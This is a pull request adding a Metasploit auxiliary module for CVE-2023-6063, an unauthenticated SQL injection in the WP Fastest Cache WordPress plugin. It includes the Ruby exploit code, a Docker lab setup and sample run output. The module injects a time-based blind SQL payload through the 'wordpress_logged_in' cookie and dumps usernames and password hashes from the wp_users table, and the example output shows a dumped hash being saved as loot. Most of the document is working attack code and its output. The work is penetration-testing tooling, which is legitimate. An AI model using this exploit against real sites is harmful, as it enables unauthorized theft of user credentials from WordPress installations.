### PR TITLE
CVE-2023-6063: Unauthenticated SQL Injection Vulnerability in WP Fastest Cache <= 1.2.2

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -63,3 +63,4 @@ royal-elementor-addons
 backup-backup
 hash-form
 give
+wp-fastest-cache

--- a/documentation/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.md
@@ -1,0 +1,134 @@
+## Vulnerable Application
+
+The vulnerability affects the **WP Fastest Cache** plugin, version **1.2.2** and below, allowing SQL injection via a multipart form.
+
+### Pre-requisites:
+   - **Docker** and **Docker Compose** installed on your system.
+
+### Setup Instructions:
+
+1. **Download the Docker Compose file**:
+   - Here is the content of the **docker-compose.yml** file to set up
+   WordPress with the vulnerable WP Fastest Cache plugin and a MySQL database.
+
+```yaml
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+2. **Start the Docker environment**:
+   - In the directory where you saved the `docker-compose.yml` file, run the following command to start the services:
+
+```bash
+docker-compose up -d
+```
+
+3. **Install WP Fastest Cache Plugin**:
+   - Download the vulnerable version of WP Fastest Cache:
+
+```bash
+wget https://downloads.wordpress.org/plugin/wp-fastest-cache.1.2.1.zip
+```
+
+   - Install the plugin in your running WordPress instance:
+     - Extract the plugin files and copy them to your WordPress container:
+
+```bash
+unzip wp-fastest-cache.1.2.1.zip
+docker cp wp-fastest-cache wordpress:/var/www/html/wp-content/plugins/
+```
+
+   - Navigate to `http://localhost:5555/wp-admin` in your browser and activate the **WP Fastest Cache** plugin in the WordPress admin panel.
+
+4. **Enable Permalinks and Caching**:
+   - Go to `Settings > Permalinks` in the WordPress dashboard and set permalinks to **Post name**.
+   - Activate the caching feature in the WP Fastest Cache settings.
+
+## Verification Steps
+
+1. **Set up WordPress** with the vulnerable **WP Fastest Cache 1.2.1** plugin.
+2. **Start Metasploit** using the command `msfconsole`.
+3. Use the correct module for the vulnerability:
+
+```bash
+   use auxiliary/scanner/http/wp_fastest_cache_sqli
+```
+
+4. Set the target's IP and URI:
+
+```bash
+   set RHOST <target_ip>
+   set TARGETURI /
+```
+
+5. **Run the module**:
+
+```bash
+   run
+```
+
+6. **Verify the SQL Injection**:
+   - After running the module, the SQL injection payload will attempt to retrieve or manipulate data from the WordPress database.
+
+## Options
+
+### COUNT
+This option specifies the number of rows to retrieve from the database during the SQL injection attack.
+For example, setting `COUNT` to 5 will retrieve 5 rows from the `wp_users` table.
+
+## Scenarios
+
+The following scenario demonstrates an SQL injection attack against a WordPress
+installation running **WP Fastest Cache <= 1.2.1** on a Docker environment with MySQL.
+
+### Step-by-step Scenario
+
+```bash
+msf6 auxiliary(scanner/http/wp_fastest_cache_sqli) > run http://127.0.0.1:5555
+
+[*] Performing SQL injection via the 'wordpress_logged_in' cookie...
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(chQnW) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) chQnW from wp_users limit 1) hsbomFD)
+[*] {SQLi} Encoded to (select group_concat(chQnW) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xe4,0)),ifnull(user_pass,repeat(0x57,0))) as binary) chQnW from wp_users limit 1) hsbomFD)
+[*] {SQLi} Time-based injection: expecting output of length 44
+[+] Dumped table contents:
+wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ chocapikk   $P$BPdY0XccQT2nvSXE8bjsn1CERoF7eJ.
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20240919001325_default_127.0.0.1_wordpress.users_514832.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
         service_name: 'Wordpress',
         address: ip,
         port: datastore['RPORT'],
-        protocol: 'tcp',
+        protocol: 'http',
         status: Metasploit::Model::Login::Status::UNTRIED
       })
       table << user

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -58,7 +58,7 @@ class MetasploitModule < Msf::Auxiliary
       res = send_request_cgi({
         'method' => 'GET',
         'cookie' => "wordpress_logged_in=\" AND (SELECT #{random_number} FROM (SELECT(#{payload}))#{random_table}) AND \"#{random_string}\"=\"#{random_string}",
-        'uri' => normalize_uri(target_uri.path)
+        'uri' => normalize_uri(target_uri.path, 'wp-admin.php')
       })
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::SQLi
   include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::WordPress
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -1,0 +1,107 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::SQLi
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress WP Fastest Cache Unauthenticated SQLi (CVE-2023-6063)',
+        'Description' => %q{
+          WP Fastest Cache, a WordPress plugin,
+          prior to version 1.2.2, is vulnerable to an unauthenticated SQL injection
+          vulnerability via the 'wordpress_logged_in' cookie. This can be exploited via a blind SQL injection attack without requiring any authentication.
+        },
+        'Author' => [
+          'Valentin Lobstein', # Metasploit Module
+          'Julien Voisin',     # Module Idea
+          'Alex Sanford'       # Vulnerability Discovery
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-6063'],
+          ['URL', 'https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/']
+        ],
+        'Actions' => [
+          ['List Data', { 'Description' => 'Queries database schema for COUNT rows' }]
+        ],
+        'DefaultAction' => 'List Data',
+        'DefaultOptions' => { 'SqliDelay' => '2' },
+        'DisclosureDate' => '2023-11-14',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of rows to retrieve', 1]),
+    ]
+  end
+
+  def run_host(ip)
+    print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")
+
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true, delay: 5 }) do |payload|
+      res = send_request_cgi({
+        'method' => 'GET',
+        'cookie' => "wordpress_logged_in=\" AND (SELECT 8859 FROM (SELECT(#{payload}))AvDn) AND \"nhxM\"=\"nhxM",
+        'uri' => normalize_uri(target_uri.path, 'wp-login.php')
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed. If this is time-based, try increasing the SqliDelay.")
+      return
+    end
+
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 4, 'Columns' => columns)
+    loot_data = ''
+
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+      loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n"
+    end
+
+    print_good('Dumped table contents:')
+    print_line(table.to_s)
+
+    loot_path = store_loot(
+      'wordpress.users',
+      'text/plain',
+      ip,
+      loot_data,
+      'wp_users.txt',
+      'WordPress Usernames and Password Hashes'
+    )
+
+    print_good("Loot saved to: #{loot_path}")
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
     ]
   end
 
-  def run_host(ip)
+  def run_host(_ip)
     print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")
 
     random_number = Rex::Text.rand_text_numeric(4..8)
@@ -63,15 +63,10 @@ class MetasploitModule < Msf::Auxiliary
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end
 
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable or delay is too short.') unless @sqli.test_vulnerable
+    print_good('Target is vulnerable to SQLi!')
+
     wordpress_sqli_initialize(@sqli)
-
-    return print_bad("#{peer} - Testing of SQLi failed. If this is time-based, try increasing the SqliDelay.") unless @sqli.test_vulnerable
-
-    table_prefix = wordpress_sqli_identify_table_prefix
-    unless table_prefix
-      fail_with(Failure::NotFound, 'Failed to identify the WordPress table prefix.')
-    end
-
-    wordpress_sqli_get_users_credentials(table_prefix, ip, datastore['COUNT'])
+    wordpress_sqli_get_users_credentials(datastore['COUNT'])
   end
 end

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -6,7 +6,7 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::SQLi
   include Msf::Auxiliary::Scanner
-  include Msf::Exploit::Remote::HTTP::WordPress
+  include Msf::Exploit::Remote::HTTP::Wordpress
 
   def initialize(info = {})
     super(

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -48,9 +48,9 @@ class MetasploitModule < Msf::Auxiliary
   def run_host(ip)
     print_status("Performing SQL injection via the 'wordpress_logged_in' cookie...")
 
-    random_number = Rex::Text.rand_text_numeric(rand(4..8))
-    random_table = Rex::Text.rand_text_alpha(rand(4..8))
-    random_string = Rex::Text.rand_text_alpha(rand(4..8))
+    random_number = Rex::Text.rand_text_numeric(4..8)
+    random_table = Rex::Text.rand_text_alpha(4..8)
+    random_string = Rex::Text.rand_text_alpha(4..8)
 
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
       res = send_request_cgi({

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Auxiliary
         service_name: 'Wordpress',
         address: ip,
         port: datastore['RPORT'],
-        protocol: 'http',
+        protocol: 'tcp',
         status: Metasploit::Model::Login::Status::UNTRIED
       })
       table << user

--- a/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_fastest_cache_sqli.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Auxiliary
       res = send_request_cgi({
         'method' => 'GET',
         'cookie' => "wordpress_logged_in=\" AND (SELECT #{random_number} FROM (SELECT(#{payload}))#{random_table}) AND \"#{random_string}\"=\"#{random_string}",
-        'uri' => normalize_uri(target_uri.path, 'wp-login.php')
+        'uri' => normalize_uri(target_uri.path)
       })
       fail_with Failure::Unreachable, 'Connection failed' unless res
     end


### PR DESCRIPTION
Hello Metasploit Team,

I have developed an **auxiliary module** for the **Unauthenticated SQL Injection Vulnerability** in **WP Fastest Cache <= 1.2.2** (CVE-2023-6063), following the request made by @jvoisin  in the issue raised here: https://github.com/rapid7/metasploit-framework/issues/18534.

This module targets the SQL injection vulnerability found in the WP Fastest Cache plugin, where the injection is performed via the `wordpress_logged_in` cookie, allowing unauthenticated attackers to extract sensitive information, such as usernames and password hashes, from the WordPress database. The setup instructions and usage scenarios are included in the module documentation.

I am looking forward to your feedback and appreciate your consideration of this contribution.